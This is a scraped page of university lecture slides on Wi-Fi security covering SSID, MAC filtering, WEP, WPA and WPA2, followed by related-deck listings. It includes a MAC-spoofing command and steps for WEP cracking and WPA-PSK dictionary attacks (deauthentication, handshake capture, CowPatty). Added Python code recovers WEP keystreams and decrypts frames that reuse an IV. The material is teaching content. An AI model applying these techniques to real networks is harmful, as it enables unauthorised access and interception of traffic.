Wireless Network Security

Wireless Networks and Mobile Computing (CSI 5169)

Amine Khalife
akhal016@uottawa.ca
Outline

1. Wireless intro & history
2. Wireless network modes
3. SSID
4. WEP
5. WPA
6. WPA2
7. Wireless Network tools
8. References
Background & Overview

- History
  - Developed for military use
  - Security widely noticed after Peter Shipley’s 2001 DefCon preso on War Driving
  - DHS labeled Wi-Fi a terrorist threat, demanded regulation
- Non Wi-Fi types
  - CDPD – 19.2 kbps analog
  - GPRS – 171.2 kbps digital
  - WAP – bandwidth-efficient content delivery
  - Ricochet – 176 kbps wireless broadband flop
  - Bluetooth – personal area networks, range limited only by transmit power
  - Blackberry – uses cellular & PCS networks, no authentication at console
- IEEE 802 series standards
  - 802.11 – wireless LANs
  - 802.15 – wireless personal area networks (e.g., Bluetooth)
  - 802.16 – wireless broadband up to 155 Mbps, wireless ISPs
802.11 Standards

- 802.11a – 54 Mbps @ 5 GHz
  - Not interoperable with 802.11b
  - Limited distance
  - Dual-mode APs require 2 chipsets, look like two APs to clients
  - Cisco products: Aironet 1200
- 802.11b – 11 Mbps @ 2.4 GHz
  - Full speed up to 300 feet
  - Coverage up to 1750 feet
  - Cisco products: Aironet 340, 350, 1100, 1200
- 802.11g – 54 Mbps @ 2.4 GHz
  - Same range as 802.11b
  - Backward-compatible with 802.11b
  - Speeds slower in dual-mode
  - Cisco products: Aironet 1100, 1200
802.11 Standards (Cont.)

- 802.11e – QoS
  - Dubbed “Wireless MultiMedia (WMM)” by the Wi-Fi Alliance
- 802.11i – Security
  - Adds AES encryption
  - Requires high CPU load, new chips required
  - TKIP is the interim solution
- 802.11n – (2009)
  - Up to 300 Mbps
  - 5 GHz and/or 2.4 GHz
  - ~230 ft range
- 802.11ac – (under development)
  - Will provide high throughput in the 5 GHz band
  - Will use wider RF bandwidth
  - Will enable multi-station WLAN throughput of at least 1 Gbps
  - A maximum single-link throughput of at least 500 Mbps
Wireless Network Modes

- The 802.11 wireless networks operate in two basic modes:
  1. Infrastructure mode
  2. Ad-hoc mode

- Infrastructure mode:
  - Each wireless client connects directly to a central device called the Access Point (AP)
  - No direct connection between wireless clients
  - The AP acts as a wireless hub that establishes the connections between wireless clients and handles them

Wireless Network Modes (cont’d)

  - The hub handles:
    - the clients’ authentication
    - authorization
    - link-level data security (access control and enabling data traffic encryption)
- Ad-hoc mode:
  - Each wireless client connects directly with each other
  - No central device manages the connections
  - Rapid deployment of a temporary network where no infrastructure exists (an advantage in case of disaster…)
  - Each node must maintain its own authentication list
SSID – Service Set Identification

- Identifies a particular wireless network
- A client must set the same SSID as the one configured on that particular AP to join the network
- Without the SSID, the client won’t be able to select and join a wireless network
- Hiding the SSID is not a security measure, because the wireless network in this case is not invisible
- It can be defeated by intruders by sniffing it from any probe signal containing it.

SSID (Cont’d)

- A way for vendors to make more money
- So easy to find the ID of a “hidden” network because the beacon broadcasting cannot be turned off
- Simply use a utility to show all the current networks:
  - inSSIDer
  - NetStumbler
  - Kismet
IEEE 802.11 Security – Access control list

- Access control list
  - Simplest security measure
  - Filters out unknown users
  - Requires a list of authorized clients’ MAC addresses to be loaded into the AP
  - Won’t protect each wireless client, nor the traffic confidentiality and integrity ===> vulnerable
  - Defeated by MAC spoofing:
    - ifconfig eth0 hw ether 00:01:02:03:04:05 (Linux)
    - SMAC - KLC Consulting (Windows)
    - MAC Makeup - H&C Works (Windows)
WEP - Wired Equivalent Privacy

- The original native security mechanism for WLANs
- Provides security over an 802.11 network
- Used to protect wireless communication from eavesdropping (confidentiality)
- Prevents unauthorized access to a wireless network (access control)
- Prevents tampering with transmitted messages (integrity)
- Provides users with the level of privacy equivalent to that built into wired networks.
WEP

1. Appends a 32-bit CRC checksum to each outgoing frame (INTEGRITY).

2. Encrypts the frame using the RC4 stream cipher with a 40-bit (standard) or 104-bit (enhanced) key plus a 24-bit random initialization vector (IV) (CONFIDENTIALITY).

3. The Initialization Vector (IV) and the default key on the station and access point are used to create a key stream.

4. The key stream is then used to convert the plain-text message into the WEP-encrypted frame.
Encrypted WEP frame (figure)

RC4 keystream XORed with plaintext (figure)
WEP Components

- Initialization Vector (IV)
  - Dynamic 24-bit value
  - Chosen randomly by the transmitting wireless network interface
  - 16.7 million possible IVs (2^24)

- Shared Secret Key
  - 40 bits long (5 ASCII characters) when a 64-bit key is used
  - 104 bits long (13 ASCII characters) when a 128-bit key is used
WEP Components (cont’d)

- The RC4 algorithm consists of 2 main parts:

  1. The Key Scheduling Algorithm (KSA):
     - Creates a scrambled state array
     - This state array is then used as input to the second phase, called the PRGA phase.

  2. The Pseudo Random Generation Algorithm (PRGA):
     - The state array from the KSA process is used here to generate the final key stream.
     - Each byte of the generated key stream is then XORed with the corresponding plain-text byte to produce the desired cipher text.
WEP Components (cont’d)

- ICV (Integrity Check Value) = CRC-32 (cyclic redundancy check) integrity check

- XOR operation
  - denoted as ⊕
  - plain-text ⊕ keystream = cipher-text
  - cipher-text ⊕ keystream = plain-text
  - plain-text ⊕ cipher-text = keystream
How WEP works (figure)

  [ IV | original unencrypted packet | checksum ]
                        |
             RC4 keystream from (IV, key)
                        v
  [ IV |            encrypted packet           ]

Encryption Process (figure)

Decryption Process (figure)
WEP Authentication

1. The station sends an authentication request to the AP.
2. The AP sends challenge text to the station.
3. The station uses its configured 64-bit or 128-bit default key to encrypt the challenge text, and sends the result to the AP.
4. The AP decrypts the encrypted text using its configured WEP key that corresponds to the station's default key.
5. The AP compares the decrypted text with the original challenge text.
6. If the decrypted text matches the original challenge text, then the access point and the station share the same WEP key, and the access point authenticates the station.
7. The station connects to the network.

WEP Authentication (Cont’d) (figure)
WEP Authentication (Cont’d)

- There is a well-documented vulnerability with shared-key authentication.
- The authentication process leaks information about the key stream.
- It is possible to derive the keystream used for the handshake by capturing the challenge frames in Shared Key authentication. SKA is regarded as insecure.
- The problem is that a monitoring attacker can observe both the challenge and the encrypted response:
  - he can determine the RC4 stream used to encrypt the response,
  - he can use that stream to encrypt any challenge he receives in the future.
WEP flaws and vulnerabilities

- Weak keys:
  - Allow an attacker to discover the default key being used by the Access Point and client stations
  - This enables an attacker to decrypt all messages being sent over the encrypted channel.
- IV reuse and small size:
  - There are only 2^24 different IVs
  - On a busy network an IV will surely be reused; if the default key has not been changed, the original message can be retrieved relatively easily.
WEP flaws and vulnerabilities (cont’d)

  - With IV reuse, it is possible to determine keystreams and hence enable an attacker to forge packets, obtaining access to the WLAN.
  - A 40-bit WEP key needs more protection from attacks than a 128-bit WEP key, but both are very weak and unable to secure Wi-Fi networks.
- Uses a weak authentication algorithm
- Uses a weak data encapsulation method
- Uses an improper integrity algorithm, i.e. CRC-32
- Lack of mutual authentication and key management
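The RC4 (KSA/PRGA) and XOR relations from the WEP Components slides, the shared-key challenge/response leak, and the IV-reuse flaw above, as one added Python example (not code from the slides): it implements WEP-style encryption and shows that a single frame with known plaintext gives back the keystream for its IV, which then decrypts any other frame sent under that IV. Keys and packets are constructed sample values.

```python
"""RC4 and the WEP keystream-reuse flaw. Added example, not code from the slides.
Frame layout: IV (24-bit, clear) || RC4(IV || key) XOR (plaintext || CRC-32 ICV).
All keys and packets below are constructed sample values."""
import struct
import zlib


def rc4_ksa(key: bytes) -> list:
    """Key Scheduling Algorithm: permute the 256-byte state array under the key."""
    s = list(range(256))
    j = 0
    for i in range(256):
        j = (j + s[i] + key[i % len(key)]) & 0xFF
        s[i], s[j] = s[j], s[i]
    return s


def rc4_keystream(key: bytes, n: int) -> bytes:
    """Pseudo Random Generation Algorithm: emit n keystream bytes from the KSA state."""
    s = rc4_ksa(key)
    i = j = 0
    out = bytearray()
    for _ in range(n):
        i = (i + 1) & 0xFF
        j = (j + s[i]) & 0xFF
        s[i], s[j] = s[j], s[i]
        out.append(s[(s[i] + s[j]) & 0xFF])
    return bytes(out)


def xor(a: bytes, b: bytes) -> bytes:
    """Byte-wise XOR, truncated to the shorter input."""
    return bytes(x ^ y for x, y in zip(a, b))


def icv(data: bytes) -> bytes:
    """WEP Integrity Check Value: CRC-32 of the plaintext (little-endian)."""
    return struct.pack("<I", zlib.crc32(data) & 0xFFFFFFFF)


def wep_encrypt(iv: bytes, key: bytes, plaintext: bytes) -> bytes:
    """Build a WEP frame body: the IV is sent in clear, the key is never sent."""
    if len(iv) != 3 or len(key) not in (5, 13):
        raise ValueError("WEP uses a 24-bit IV and a 40- or 104-bit key")
    body = plaintext + icv(plaintext)
    return iv + xor(body, rc4_keystream(iv + key, len(body)))


def wep_decrypt(key: bytes, frame: bytes):
    """Return (plaintext, icv_ok); the receiver reads the IV from the frame."""
    iv, body = frame[:3], frame[3:]
    clear = xor(body, rc4_keystream(iv + key, len(body)))
    plaintext, received_icv = clear[:-4], clear[-4:]
    # CRC-32 only catches accidental corruption: it is linear, not a keyed MIC.
    return plaintext, received_icv == icv(plaintext)


def recover_keystream(frame: bytes, known_plaintext: bytes) -> bytes:
    """plain-text XOR cipher-text = keystream, with no key needed. This is what an
    observer of a shared-key challenge and its encrypted response learns."""
    return xor(frame[3:], known_plaintext + icv(known_plaintext))


def decrypt_reused_iv(known_frame: bytes, known_plaintext: bytes, other_frame: bytes) -> bytes:
    """Frames sent under the same IV (and key) share one keystream, so the frame
    with known plaintext decrypts the other one, up to the known frame's length."""
    if known_frame[:3] != other_frame[:3]:
        raise ValueError("IVs differ: no keystream reuse")
    if len(other_frame) > len(known_frame):
        raise ValueError("known plaintext too short to cover the other frame")
    keystream = recover_keystream(known_frame, known_plaintext)
    return xor(other_frame[3:], keystream)[:-4]    # strip the decrypted ICV


def demo() -> dict:
    """Constructed scenario: one 40-bit key, one IV reused for two frames."""
    key = bytes.fromhex("0123456789")          # constructed 40-bit WEP key
    iv = bytes.fromhex("0a0b0c")               # constructed IV, reused below
    known = b"GET /index.html HTTP/1.0\r\n"    # predictable packet: plaintext known
    secret = b"user=alice&pw=hunter2"          # another packet under the same IV
    f_known = wep_encrypt(iv, key, known)
    f_secret = wep_encrypt(iv, key, secret)
    return {
        "roundtrip": wep_decrypt(key, f_secret),
        "recovered": decrypt_reused_iv(f_known, known, f_secret),
    }


if __name__ == "__main__":
    print(demo())
```

With only 2^24 IVs and no key rotation, a defender should treat every WEP frame as readable by anyone who has seen one known-plaintext frame under the same IV; the ICV check does nothing to change that.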



Attacks on WEP

- WEP-encrypted networks can be cracked in 10 minutes
- The goal is to collect enough IVs to be able to crack the key
- IV = Initialization Vector, a cleartext value concatenated with the key to avoid keystream repetition
- Injecting packets generates IVs
Attacks on WEP

- Backtrack 5 (released 1st March 2012)
- A tutorial is available
- All required tools on a Linux bootable CD + laptop + wireless card

WEP cracking example (figure)
WPA - Wi-Fi Protected Access

- New technique in 2002
- Replacement for the flawed security of WEP
- Improved data encryption
- Strong user authentication
- Because of the many attacks related to static keys, WPA minimizes use of the shared secret key in accordance with frame transmission
- Uses the RC4 algorithm in a proper way and provides fast transfer of the data before someone can decrypt the data
WPA

- Data is encrypted using the RC4 stream cipher, with a 128-bit key and a 48-bit initialization vector (IV).
- One major improvement in WPA over WEP is the Temporal Key Integrity Protocol (TKIP), which dynamically changes keys as the system is used.
- When combined with the much larger IV, this defeats the well-known key recovery attacks on WEP.
- WPA also provides vastly improved payload integrity.
WPA

- A more secure message authentication code (usually known as a MAC, but here termed a MIC for "Message Integrity Code") is used in WPA, an algorithm named "Michael".
- The MIC used in WPA includes a frame counter, which prevents replay attacks from being executed.
- The Michael algorithm is a strong algorithm that would still work with most older network cards.
- WPA includes a special countermeasure mechanism that detects an attempt to break TKIP and temporarily blocks communications with the attacker.

WPA (figure)
How WPA Addresses the WEP Vulnerabilities

- WPA wraps the RC4 cipher engine in four new algorithms:
  1. Extended 48-bit IV and IV Sequencing Rules
     - 2^48 is a large number! More than 500 trillion
     - Sequencing rules specify how IVs are selected and verified
  2. A Message Integrity Code (MIC) called Michael
     - Designed for deployed hardware
     - Requires use of active countermeasures
  3. Key Derivation and Distribution
     - Initial random number exchanges defeat man-in-the-middle attacks
  4. Temporal Key Integrity Protocol generates per-packet keys
WPA2 - Wi-Fi Protected Access 2

- Based on the IEEE 802.11i standard
- 2 versions: Personal & Enterprise
- The primary enhancement over WPA is the use of the AES (Advanced Encryption Standard) algorithm
- The encryption in WPA2 is done by utilizing either AES or TKIP
- The Personal mode uses a PSK (Pre-shared key) & does not require a separate authentication of users
- The Enterprise mode requires the users to be separately authenticated by using the EAP protocol
WPA2

- WPA2 uses AES with a key length of 128 bits to encrypt the data
- AES is used through the Counter-Mode/CBC-MAC Protocol (CCMP)
- CCMP uses the same key for both encryption and authentication, but with different initialization vectors
WPA2

- WPA2 has immunity against many types of hacker attacks:
  - Man-in-the-middle
  - Authentication forging
  - Replay
  - Key collision
  - Weak keys
  - Packet forging
  - Dictionary attacks

WPA2 weaknesses

- Can’t protect against session hijacking
- Can’t stand up to physical-layer attacks:
  - RF jamming
  - Data flooding
  - Access point failure
- Vulnerable to MAC address spoofing
Am I secure if I use WPA-PSK?

- WPA-PSK protected networks are vulnerable to dictionary attacks
- Works against WPA & WPA2 (802.11i)
- New attack techniques have increased the speed of this attack – CowPatty 4.6
  - Run CowPatty against captured packets to crack the key
  - Needs the SSID to crack the WPA-PSK, easily obtainable!
  - Also supports WPA2-PSK cracking with the same pre-computed tables!
- Spoof the MAC address of the AP and tell the client to disassociate
- Sniff the wireless network for the WPA-PSK handshake (EAPOL)
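Why the dictionary attack above needs the SSID, and why pre-computed tables are SSID-specific, as an added Python example (not code from the slides): the IEEE 802.11i passphrase-to-PMK mapping is PBKDF2-HMAC-SHA1 with the SSID as the salt. The passphrase and SSIDs used in demo() are constructed sample values.

```python
"""WPA/WPA2-Personal key derivation. Added example, not code from the slides.
802.11i maps the passphrase to the 256-bit Pairwise Master Key (PMK) with
PBKDF2-HMAC-SHA1(passphrase, salt=SSID, 4096 iterations). Because the SSID is the
salt, a (passphrase -> PMK) table is only valid for the SSID it was computed for."""
import hashlib


def wpa_psk_pmk(passphrase: str, ssid: str) -> bytes:
    """Pairwise Master Key for WPA/WPA2-PSK (IEEE 802.11i passphrase-to-PSK mapping)."""
    if not 8 <= len(passphrase) <= 63:
        raise ValueError("802.11i passphrases are 8 to 63 ASCII characters")
    return hashlib.pbkdf2_hmac(
        "sha1", passphrase.encode("ascii"), ssid.encode("utf-8"), 4096, dklen=32
    )


def table_is_reusable(passphrase: str, ssid_built_for: str, ssid_target: str) -> bool:
    """True only if a table built for ssid_built_for yields the target network's PMK,
    i.e. only when the SSIDs are identical."""
    return wpa_psk_pmk(passphrase, ssid_built_for) == wpa_psk_pmk(passphrase, ssid_target)


def demo() -> dict:
    """Constructed scenario: one weak passphrase, a default SSID and a unique one."""
    weak = "password123"                        # constructed weak passphrase
    default_ssid = "linksys"                    # a common default SSID name
    unique_ssid = "home-net-7f3a"               # constructed, site-specific SSID
    return {
        "default_ssid_table_reusable": table_is_reusable(weak, default_ssid, default_ssid),
        "unique_ssid_table_reusable": table_is_reusable(weak, default_ssid, unique_ssid),
    }


if __name__ == "__main__":
    print(demo())
```

For a defender the two levers follow directly: a unique SSID invalidates any shared pre-computed table, and a long random passphrase makes the 4096-iteration cost per guess prohibitive.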


WPA Cracking Example (figure)
WEP vs WPA vs WPA2

                   WEP                          WPA                       WPA2
ENCRYPTION         RC4                          RC4                       AES
KEY ROTATION       None                         Dynamic session keys      Dynamic session keys
KEY DISTRIBUTION   Manually typed into          Automatic distribution    Automatic distribution
                   each device                  available                 available
AUTHENTICATION     Uses WEP key as              Can use 802.1x & EAP      Can use 802.1x & EAP
                   authentication
Procedures to improve wireless security

- Use a wireless intrusion prevention system (WIPS)
- Enable WPA-PSK
- Use a good passphrase (https://grc.com/password)
- Use WPA2 where possible
- AES is more secure; use TKIP for better performance
- Change your SSID every so often
- Wireless network users should use or upgrade their network to the latest security standard released
Wireless Network tools

- MAC Spoofing
  - http://aspoof.sourceforge.net/
  - http://www.gorlani.com/publicprj/macmakeup/macmakeup.asp
  - http://www.klcconsulting.net/smac/
- WEP Cracking tools
  - http://www.backtrack-linux.org/
  - http://www.remote-exploit.org/articles/backtrack/index.html
  - http://wepattack.sourceforge.net/
  - http://wepcrack.sourceforge.net/
- Wireless Analysers
  - http://www.kismetwireless.net/
  - http://www.netstumbler.com/
Questions

Q1) Given the cipher-text 11010110 and the plaintext 00110101, compute the keystream.

A1) cipher-text: 1 1 0 1 0 1 1 0
    plain-text:  0 0 1 1 0 1 0 1
    keystream:   1 1 1 0 0 0 1 1

Encrypting: plain-text ⊕ keystream = cipher-text

Decrypting: cipher-text ⊕ keystream = plain-text
Questions (Cont’d)

Q2) Why is the SSID hiding or disabling technique not 100% effective?

A2) The beacon broadcasting cannot be turned off, and hackers can still detect the SSID by sniffing different messages using hacking tools.

Questions (Cont’d)

Q3) List 4 WEP vulnerabilities

A3)
  1. The Initialization Vector (IV) is too small
  2. The Integrity Check Value (ICV) algorithm is not appropriate
  3. WEP’s use of RC4 is weak
  4. Authentication messages can be easily forged
REFERENCES

1. Hytnen, R., and Garcia, M. An Analysis of Wireless Security. 2006.
2. Whalen, S. Analysis of WEP and RC4 Algorithms. March 2002.
3. http://en.wikipedia.org/wiki/IEEE_802.1X
4. Wireless LAN Medium Access Control and Physical Layer Specifications. IEEE Std 802.11. June 2007.
5. http://en.wikipedia.org/wiki/Wired_Equivalent_Privacy
6. http://en.wikipedia.org/wiki/Advanced_Encryption_Standard

Thank You!
Questions?

Contenu connexe

Tendances

Session Hijacking ppt
Session Hijacking pptSession Hijacking ppt
Session Hijacking pptHarsh Kevadia
 
Advanced Wi-Fi pentesting
Advanced Wi-Fi pentestingAdvanced Wi-Fi pentesting
Advanced Wi-Fi pentestingYunfei Yang
 
Wireless Device and Network level security
Wireless Device and Network level securityWireless Device and Network level security
Wireless Device and Network level securityChetan Kumar S
 
Firewall presentation
Firewall presentationFirewall presentation
Firewall presentationgaurav96raj
 
Traditional Firewall vs. Next Generation Firewall
Traditional Firewall vs. Next Generation FirewallTraditional Firewall vs. Next Generation Firewall
Traditional Firewall vs. Next Generation Firewall美兰 曾
 
Wireless network security
Wireless network security Wireless network security
Wireless network security Aurobindo Nayak
 
Why Zero Trust Architecture Will Become the New Normal in 2021
Why Zero Trust Architecture Will Become the New Normal in 2021Why Zero Trust Architecture Will Become the New Normal in 2021
Why Zero Trust Architecture Will Become the New Normal in 2021Cloudflare
 
Network function virtualization
Network function virtualizationNetwork function virtualization
Network function virtualizationSatish Chavan
 
Idea(international data encryption algorithm)
Idea(international data encryption algorithm)Idea(international data encryption algorithm)
Idea(international data encryption algorithm)SAurabh PRajapati
 
Next generation firewall(ngfw)feature and benefits
Next generation firewall(ngfw)feature and benefitsNext generation firewall(ngfw)feature and benefits
Next generation firewall(ngfw)feature and benefitsAnthony Daniel
 

Tendances (20)

WPA2
WPA2WPA2
WPA2
 
Session Hijacking ppt
Session Hijacking pptSession Hijacking ppt
Session Hijacking ppt
 
Advanced Wi-Fi pentesting
Advanced Wi-Fi pentestingAdvanced Wi-Fi pentesting
Advanced Wi-Fi pentesting
 
Wpa vs Wpa2
Wpa vs Wpa2Wpa vs Wpa2
Wpa vs Wpa2
 
Wireless Device and Network level security
Wireless Device and Network level securityWireless Device and Network level security
Wireless Device and Network level security
 
WiFi Secuiry: Attack & Defence
WiFi Secuiry: Attack & DefenceWiFi Secuiry: Attack & Defence
WiFi Secuiry: Attack & Defence
 
Firewall presentation
Firewall presentationFirewall presentation
Firewall presentation
 
Traditional Firewall vs. Next Generation Firewall
Traditional Firewall vs. Next Generation FirewallTraditional Firewall vs. Next Generation Firewall
Traditional Firewall vs. Next Generation Firewall
 
WEP
WEPWEP
WEP
 
Wireless network security
Wireless network security Wireless network security
Wireless network security
 
Why Zero Trust Architecture Will Become the New Normal in 2021
Why Zero Trust Architecture Will Become the New Normal in 2021Why Zero Trust Architecture Will Become the New Normal in 2021
Why Zero Trust Architecture Will Become the New Normal in 2021
 
Wifi Security
Wifi SecurityWifi Security
Wifi Security
 
Network function virtualization
Network function virtualizationNetwork function virtualization
Network function virtualization
 
Internet Key Exchange Protocol
Internet Key Exchange ProtocolInternet Key Exchange Protocol
Internet Key Exchange Protocol
 
Firewall Basing
Firewall BasingFirewall Basing
Firewall Basing
 
Kerberos
KerberosKerberos
Kerberos
 
Idea(international data encryption algorithm)
Idea(international data encryption algorithm)Idea(international data encryption algorithm)
Idea(international data encryption algorithm)
 
WPA-3: SEA and Dragonfly
WPA-3: SEA and DragonflyWPA-3: SEA and Dragonfly
WPA-3: SEA and Dragonfly
 
Next generation firewall(ngfw)feature and benefits
Next generation firewall(ngfw)feature and benefitsNext generation firewall(ngfw)feature and benefits
Next generation firewall(ngfw)feature and benefits
 
Wi-fi Hacking
Wi-fi HackingWi-fi Hacking
Wi-fi Hacking
 

En vedette

Wireless Network Security
Wireless Network SecurityWireless Network Security
Wireless Network SecurityGyana Ranjana
 
Pentesting Wireless Networks and Wireless Network Security
Pentesting Wireless Networks and Wireless Network SecurityPentesting Wireless Networks and Wireless Network Security
Pentesting Wireless Networks and Wireless Network SecurityAyoma Wijethunga
 
Understanding IT Network Security for Wireless and Wired Measurement Applicat...
Understanding IT Network Security for Wireless and Wired Measurement Applicat...Understanding IT Network Security for Wireless and Wired Measurement Applicat...
Understanding IT Network Security for Wireless and Wired Measurement Applicat...cmstiernberg
 
Wireless Security null seminar
Wireless Security null seminarWireless Security null seminar
Wireless Security null seminarNilesh Sapariya
 
Wireless LAN Security, Policy, and Deployment Best Practices
Wireless LAN Security, Policy, and Deployment Best PracticesWireless LAN Security, Policy, and Deployment Best Practices
Wireless LAN Security, Policy, and Deployment Best PracticesCisco Mobility
 
wimax Ppt for seminar
wimax Ppt for seminarwimax Ppt for seminar
wimax Ppt for seminarPratik Anand
 

En vedette (14)

Wireless Network Security
Wireless Network SecurityWireless Network Security
Wireless Network Security
 
Pentesting Wireless Networks and Wireless Network Security
Pentesting Wireless Networks and Wireless Network SecurityPentesting Wireless Networks and Wireless Network Security
Pentesting Wireless Networks and Wireless Network Security
 
Understanding IT Network Security for Wireless and Wired Measurement Applicat...
Understanding IT Network Security for Wireless and Wired Measurement Applicat...Understanding IT Network Security for Wireless and Wired Measurement Applicat...
Understanding IT Network Security for Wireless and Wired Measurement Applicat...
 
Securing wireless network
Securing wireless networkSecuring wireless network
Securing wireless network
 
Wlan security
Wlan securityWlan security
Wlan security
 
Wireless Security null seminar
Wireless Security null seminarWireless Security null seminar
Wireless Security null seminar
 
WiMAX Basics
WiMAX Basics WiMAX Basics
WiMAX Basics
 
Wlan security
Wlan securityWlan security
Wlan security
 
Cisco project ideas
Cisco   project ideasCisco   project ideas
Cisco project ideas
 
Wireless LAN Security, Policy, and Deployment Best Practices
Wireless LAN Security, Policy, and Deployment Best PracticesWireless LAN Security, Policy, and Deployment Best Practices
Wireless LAN Security, Policy, and Deployment Best Practices
 
Ch06 Wireless Network Security
Ch06 Wireless Network SecurityCh06 Wireless Network Security
Ch06 Wireless Network Security
 
Wimax
WimaxWimax
Wimax
 
Network security
Network security Network security
Network security
 
wimax Ppt for seminar
wimax Ppt for seminarwimax Ppt for seminar
wimax Ppt for seminar
 

Similaire à 5169 wireless network_security_amine_k

4 wifi security
4 wifi security4 wifi security
4 wifi securityal-sari7
 
Chapter 7 - Wireless Network Security.pptx
Chapter 7 - Wireless Network Security.pptxChapter 7 - Wireless Network Security.pptx
Chapter 7 - Wireless Network Security.pptxAmanuelZewdie4
 
Wireless security837
Wireless security837Wireless security837
Wireless security837mark scott
 
Security Issues of 802.11b
Security Issues of 802.11bSecurity Issues of 802.11b
Security Issues of 802.11bguestd7b627
 
Security Issues of IEEE 802.11b
Security Issues of IEEE 802.11bSecurity Issues of IEEE 802.11b
Security Issues of IEEE 802.11bSreekanth GS
 
Wireless and WLAN Secuirty, Presented by Vijay
Wireless and WLAN Secuirty, Presented by VijayWireless and WLAN Secuirty, Presented by Vijay
Wireless and WLAN Secuirty, Presented by Vijaythevijayps
 
Wireless hacking and security
Wireless hacking and securityWireless hacking and security
Wireless hacking and securityAdel Zalok
 
Hacking Wireless Networks by Mandeep Singh Jadon
Hacking Wireless Networks by Mandeep Singh JadonHacking Wireless Networks by Mandeep Singh Jadon
Hacking Wireless Networks by Mandeep Singh JadonOWASP Delhi
 
Attack Robustness and Security Enhancement with Improved Wired Equivalent Pro...
Attack Robustness and Security Enhancement with Improved Wired Equivalent Pro...Attack Robustness and Security Enhancement with Improved Wired Equivalent Pro...
Attack Robustness and Security Enhancement with Improved Wired Equivalent Pro...IDES Editor
 
Hacking Wireless Networks : Null Delhi (November)
Hacking Wireless Networks : Null Delhi (November)Hacking Wireless Networks : Null Delhi (November)
Hacking Wireless Networks : Null Delhi (November)Mandeep Jadon
 
Wireless hacking septafiansyah
Wireless hacking   septafiansyahWireless hacking   septafiansyah
Wireless hacking septafiansyahSeptafiansyah P
 
Wireless LAN Deployment Best Practices
Wireless LAN Deployment Best PracticesWireless LAN Deployment Best Practices
Wireless LAN Deployment Best PracticesMichael Boman
 
WLAN SECURITY BY SAIKIRAN PANJALA
WLAN SECURITY BY SAIKIRAN PANJALAWLAN SECURITY BY SAIKIRAN PANJALA
WLAN SECURITY BY SAIKIRAN PANJALASaikiran Panjala
 

Similaire à 5169 wireless network_security_amine_k (20)

4 wifi security
4 wifi security4 wifi security
4 wifi security
 
Shashank wireless lans security
Shashank wireless lans securityShashank wireless lans security
Shashank wireless lans security
 
Wi fi security
Wi fi securityWi fi security
Wi fi security
 
Chapter 7 - Wireless Network Security.pptx
Chapter 7 - Wireless Network Security.pptxChapter 7 - Wireless Network Security.pptx
Chapter 7 - Wireless Network Security.pptx
 
Wireless lan security(10.8)
Wireless lan security(10.8)Wireless lan security(10.8)
Wireless lan security(10.8)
 
Wireless security837
Wireless security837Wireless security837
Wireless security837
 
Security Issues of 802.11b
Security Issues of 802.11bSecurity Issues of 802.11b
Security Issues of 802.11b
 
Security Issues of IEEE 802.11b
Security Issues of IEEE 802.11bSecurity Issues of IEEE 802.11b
Security Issues of IEEE 802.11b
 
Wi Fi Technology
Wi Fi TechnologyWi Fi Technology
Wi Fi Technology
 
Wireless and WLAN Secuirty, Presented by Vijay
Wireless and WLAN Secuirty, Presented by VijayWireless and WLAN Secuirty, Presented by Vijay
Wireless and WLAN Secuirty, Presented by Vijay
 
Wireless hacking and security
Wireless hacking and securityWireless hacking and security
Wireless hacking and security
 
Hacking Wireless Networks by Mandeep Singh Jadon
Hacking Wireless Networks by Mandeep Singh JadonHacking Wireless Networks by Mandeep Singh Jadon
Hacking Wireless Networks by Mandeep Singh Jadon
 
Attack Robustness and Security Enhancement with Improved Wired Equivalent Pro...
Attack Robustness and Security Enhancement with Improved Wired Equivalent Pro...Attack Robustness and Security Enhancement with Improved Wired Equivalent Pro...
Attack Robustness and Security Enhancement with Improved Wired Equivalent Pro...
 
Resilience in the ZigBee Residential Mode
Resilience in the ZigBee Residential ModeResilience in the ZigBee Residential Mode
Resilience in the ZigBee Residential Mode
 
Hacking Wireless Networks : Null Delhi (November)
Hacking Wireless Networks : Null Delhi (November)Hacking Wireless Networks : Null Delhi (November)
Hacking Wireless Networks : Null Delhi (November)
 
Wireless hacking septafiansyah
Wireless hacking   septafiansyahWireless hacking   septafiansyah
Wireless hacking septafiansyah
 
Wireless LAN Deployment Best Practices
Wireless LAN Deployment Best PracticesWireless LAN Deployment Best Practices
Wireless LAN Deployment Best Practices
 
Wireless security
Wireless securityWireless security
Wireless security
 
WLAN SECURITY BY SAIKIRAN PANJALA
WLAN SECURITY BY SAIKIRAN PANJALAWLAN SECURITY BY SAIKIRAN PANJALA
WLAN SECURITY BY SAIKIRAN PANJALA
 
Wifi hacking
Wifi hackingWifi hacking
Wifi hacking
 

5169 wireless network_security_amine_k

  • 1. Wireless Network Security
    Wireless Networks and Mobile Computing (CSI 5169)
    Amine Khalife
    akhal016@uottawa.ca
  • 2. Outline
    1. Wireless intro & history
    2. Wireless network modes
    3. SSID
    4. WEP
    5. WPA
    6. WPA2
    7. Wireless Network tools
    8. References
  • 3. Background & Overview
     History
        Developed for military use
        Security widely noticed after Peter Shipley’s 2001 DefCon presentation on war driving
        DHS labeled Wi-Fi a terrorist threat, demanded regulation
     Non Wi-Fi types
        CDPD – 19.2 kbps analog
        GPRS – 171.2 kbps digital
        WAP – bandwidth-efficient content delivery
        Ricochet – 176 kbps wireless broadband flop
        Bluetooth – personal area networks, range limited only by transmit power
        Blackberry – uses cellular & PCS networks, no authentication at console
     IEEE 802 series standards
        802.11 – wireless LANs
        802.15 – wireless personal area networks (e.g., Bluetooth)
        802.16 – wireless broadband up to 155 Mbps, wireless ISPs
  • 4. 802.11 Standards
     802.11a – 54 Mbps @ 5 GHz
        Not interoperable with 802.11b
        Limited distance
        Dual-mode APs require 2 chipsets, look like two APs to clients
        Cisco products: Aironet 1200
     802.11b – 11 Mbps @ 2.4 GHz
        Full speed up to 300 feet
        Coverage up to 1750 feet
        Cisco products: Aironet 340, 350, 1100, 1200
     802.11g – 54 Mbps @ 2.4 GHz
        Same range as 802.11b
        Backward-compatible with 802.11b
        Speeds slower in dual-mode (when 802.11b clients are present)
        Cisco products: Aironet 1100, 1200
  • 5. 802.11 Standards (Cont.)
     802.11e – QoS
        Dubbed “Wireless MultiMedia (WMM)” by the Wi-Fi Alliance
     802.11i – Security
        Adds AES encryption
        Requires more CPU; new chips required
        TKIP is the interim solution for existing hardware
     802.11n – (2009)
        Up to 300 Mbps with two spatial streams (the standard allows up to 600 Mbps)
        5 GHz and/or 2.4 GHz
        ~230 ft range
     802.11ac – (a draft at the time of this deck; ratified in December 2013)
        High throughput in the 5 GHz band
        Wider RF channel bandwidth
        Multi-station WLAN throughput of at least 1 Gbps
